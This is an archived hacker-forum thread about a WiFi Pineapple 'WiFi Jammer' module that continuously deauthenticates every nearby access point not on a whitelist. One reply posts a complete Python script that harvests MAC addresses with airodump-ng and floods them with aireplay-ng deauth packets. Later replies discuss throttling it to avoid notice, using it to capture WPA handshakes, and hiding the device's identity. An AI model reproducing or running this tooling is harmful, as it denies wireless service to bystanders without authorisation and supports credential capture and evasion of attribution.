Jump to content

Archived

This topic is now archived and is closed to further replies.

Whistle Master

Wifi Jammer

Recommended Posts

Hi there !

I wanted to share with you my last module for the pineapple: a WiFi Jammer ;)

Features
- Using deauth with aireplay
- Whitelist / Blacklist based on regexp
- Autostart

Screenshots
b571ab893ccb6b7204600496a2aa34a0379bcf0e 02171fa4b19e3d836892f569d13199e90bc530bb

Simplified Usage

- Select the interface to be used from WLAN interface drop-down list (e.g. wlan1).

- Click on Start Monitor.

- Monitor interface drop-down list will be refreshed (e.g. mon0).

- Click on Whitelist tab and click on Refresh link to show APs around and click on APs to be added to your whitelist which will be NOT DeAuth'ed.

- Click on Start link next to WiFi Jammer disabled

Troubleshooting procedure

1. No APs are found in the Whitelist or Blacklist

Select the interface from WLAN interface drop-down list (e.g. wlan1) and click on Auto to disable and re-enable the interface. Then try again.

2. No APs are DeAuth'ed

Select the interface from WLAN interface drop-down list (e.g. wlan1) and click on Auto to disable and re-enable the interface. Then try again.

Share this post


Link to post
Share on other sites

So you can allow certain connections through with the whitelist, while constantly deauthing others?

Share this post


Link to post
Share on other sites

Yes, you can add AP(s) in the whitelist which won't be deAuth'ed, while the others will be deAuth'ed constantly :)

EDIT: I added also a blacklist to bring more flexibility to the jammer.

Share this post


Link to post
Share on other sites

I was working on something extremely similar a few weeks ago but I don't have one of the new pineapples to test it on. I used regular expressions too. I'll post it here and perhaps you could integrate it to the pineapple, no web interface though : P

"""
This script is designed to deauthenticate all macs found in the air
with the exception of whitelisted ones. Input known good client and
AP and all other MACs on 2.4 ghz in the area are denied service. 
"""

import subprocess
import time
import sys
import re
import sys

iface = 'mon0'

# List of macs to deauth
todeauth = []

# Don't deauth
mymac = ''
myap = ''

searchmac = re.compile(r'([a-fA-F0-9]{2}[:|\-]){5}[a-fA-F0-9]{2}')

# Takes all macs from airodump-ng stderr and puts them into list
def grabMacs():
    proc = subprocess.Popen(['airodump-ng',
                             '%s' % iface],
                            stdout = subprocess.PIPE,
                            stderr = subprocess.PIPE,
                            executable='/usr/sbin/airodump-ng')
    print('one second. im thinking...')
    time.sleep(10)
    for x in proc.stderr:
        a = searchmac.search(x)
        if a:
            todeauth.append(x[a.start():a.end()])
            print(x[a.start():a.end()])
        elif len(todeauth) > 15: break
    sys.stdout.flush()

# Takes all macs from airodump-ng output csv file and puts into list
def snabMacs():
    subprocess.Popen(['airodump-ng',
                     '-w', 'test1234-01.csv',
                     iface],
                     stderr = subprocess.PIPE)
    print('collecting MACs for 10 seconds...')
    time.sleep(10)
    file = open('test1234-01.csv-01.csv')
    for x in file:
        a = searchmac.search(x)
        if a:
            print(x[a.start():a.end()])
            todeauth.append(x[a.start():a.end()])

# Deauth all targets in todeauth list from grabMacs or snabMacs
# function. Will remove known good macs as mymac and myap input.
def massDeauth(todeauth, mymac, myap):
    if myap in todeauth:
        todeauth.remove(myap)
        print('known good ap was successfully removed from deauth list')
    elif mymac in todeauth:
        todeauth.remove(mymac)
        print('known good mac was sucessfully removed from deauth list')
    elif len(todeauth) > 0:
        print('starting deauths')
        for x in todeauth:
            proc = subprocess.Popen(['aireplay-ng',
                                     '-0','0','-a',
                                    x, iface],
                                    stdout = subprocess.PIPE,
                                    stderr = subprocess.PIPE)
            print('deauthing...')
            proc.terminate()


snabMacs()
time.sleep(3.5)
massDeauth(todeauth, mymac, myap)

Share this post


Link to post
Share on other sites

I was working on something extremely similar a few weeks ago but I don't have one of the new pineapples to test it on. I used regular expressions too. I'll post it here and perhaps you could integrate it to the pineapple, no web interface though : P

Thanks for your input. However, I made everything in shell scripts to keep CPU / memory footprint as low as possible :)

Do we need an extra wi-fi card/ pineapple to both block/use karma?

For the moment yes, because aireplay-ng does not work properly and you have to switch off / on the monitor interface before use it. But then, karma won't work anymore until the next reboot.

Share this post


Link to post
Share on other sites

Cool whistlemaster. Never tried it using bash. This week I am going to start working on one that uses pylorcon to send the deauth packets so there is no dependency on aireplay-ng.

Share this post


Link to post
Share on other sites
Posted · Hidden by Whistle Master, May 25, 2012 - No reason given
Hidden by Whistle Master, May 25, 2012 - No reason given

I have a version ready to be tested, for those interested, please find send me a PM.

Share this post


Link to post

Just what the doctor (and 2.3.1!) ordered! Thanks for the update WM!

telot

Share this post


Link to post
Share on other sites

Would i be right in saying that you can't browse the web whilst the router is jamming even if the routers address is added to the white list? Also the jammer does jam its own ap by default right? Awesome tool btw, thanks.

- Anton

Share this post


Link to post
Share on other sites

Thank you very much for even more ways to use Jasager (when I finally get my USB>UART adapter to flash my ALFA)

How effective is it? I can imagine that only the A/Ps with the best signals will get a deauth.

Share this post


Link to post
Share on other sites

Would i be right in saying that you can't browse the web whilst the router is jamming even if the routers address is added to the white list? Also the jammer does jam its own ap by default right? Awesome tool btw, thanks.

- Anton

APs on the whitelist are not DeAuth'ed, so you should still be able to browse internet through AP not DeAuth'ed. By default, everything is DeAuth'ed :)

Thank you very much for even more ways to use Jasager (when I finally get my USB>UART adapter to flash my ALFA)

How effective is it? I can imagine that only the A/Ps with the best signals will get a deauth.

APs in sight of the pineapple will be DeAuth'ed.

Share this post


Link to post
Share on other sites

hey WM great module:-D sorry I couldn't test last week:-(

2 things the link start monitor is cut, box needs to be wider I think.

and after starting the module using the NHA mon0 "btw works great and I was able to successfully whitelist the pineapple" when you press stop it's still running?

ps.

one thing I would love to see is a deauth mode that is controllable? as in run every 10 minutes deauthing only 1 to 5 packets so that I don't piss off too many people, also maybe there is a command one could pass using the button module to run jammer the one time/for 1 minute

just a thought.

Share this post


Link to post
Share on other sites

2 things the link start monitor is cut, box needs to be wider I think.

and after starting the module using the NHA mon0 "btw works great and I was able to successfully whitelist the pineapple" when you press stop it's still running?

Could you please send me a screenshot of the problem ? I'm testing my modules only with Firefox, assuming not too many people are using IE :-P

The stop button should stop everything, maybe with a little delay, because of the auto-refresh running which send continuously requests.

ps.

one thing I would love to see is a deauth mode that is controllable? as in run every 10 minutes deauthing only 1 to 5 packets so that I don't piss off too many people, also maybe there is a command one could pass using the button module to run jammer the one time/for 1 minute

just a thought.

Nice idea! I will have a look to add some settings :)

Share this post


Link to post
Share on other sites

Could you please send me a screenshot of the problem ? I'm testing my modules only with Firefox, assuming not too many people are using IE :-P

The stop button should stop everything, maybe with a little delay, because of the auto-refresh running which send continuously requests.

Nice idea! I will have a look to add some settings :)

I am using firefox too v13.0.1

well it says it's stopped but my phone will continue to get deauthed, I left it for just over a minute, then stopped the monitor interface and that ended deauthing but I would imagine It's still running

Share this post


Link to post
Share on other sites

I am using firefox too v13.0.1

well it says it's stopped but my phone will continue to get deauthed, I left it for just over a minute, then stopped the monitor interface and that ended deauthing but I would imagine It's still running

Could you do a quick test: start the module from the web interface, then ssh to your pineapple and issue the following commands:

ps auxww

ps auxww | grep jammer.sh | grep -v -e grep | grep -v -e php

Then stop the module from the web interface and issue the same above commands from ssh and post all the output.

Thanks ;)

Share this post


Link to post
Share on other sites

A new version will be out soon with new functionalities to control the jammer: sleeping time & number of deauths to send.

Share this post


Link to post
Share on other sites

A new version will be out soon with new functionalities to control the jammer: sleeping time & number of deauths to send.

Perfect for automaticly capturing WPA handshake's :D

Share this post


Link to post
Share on other sites

Is this module available for mk3? or maybe it can be easily ported.

No.

It could theoretically be ported but the module system is not available on the MK3 and may not ever fully be.

I am still hoping to bring out one last version of the MK3 firmware - it just takes a lot of time.

Best,

Sebkinne

Share this post


Link to post
Share on other sites

does this fake the mac address before sending deauth packets out? Good tool, however, just want to make sure that it hides the correct pineapple identity..

Share this post


Link to post
Share on other sites

how about a short tutorial? I can't seem to get this one working. I can, however, use my netbook and deauth my router. Just think it would be cool to be able to do it all from the pineapple. I assume WhistleMaster has it going. Oh, to be a guru of helmholtz resonation. I can't even get the damn awus 036h to work with my pineapples.

Share this post


Link to post
Share on other sites

  • Recently Browsing   0 members

    No registered users viewing this page.

×
×
  • Create New...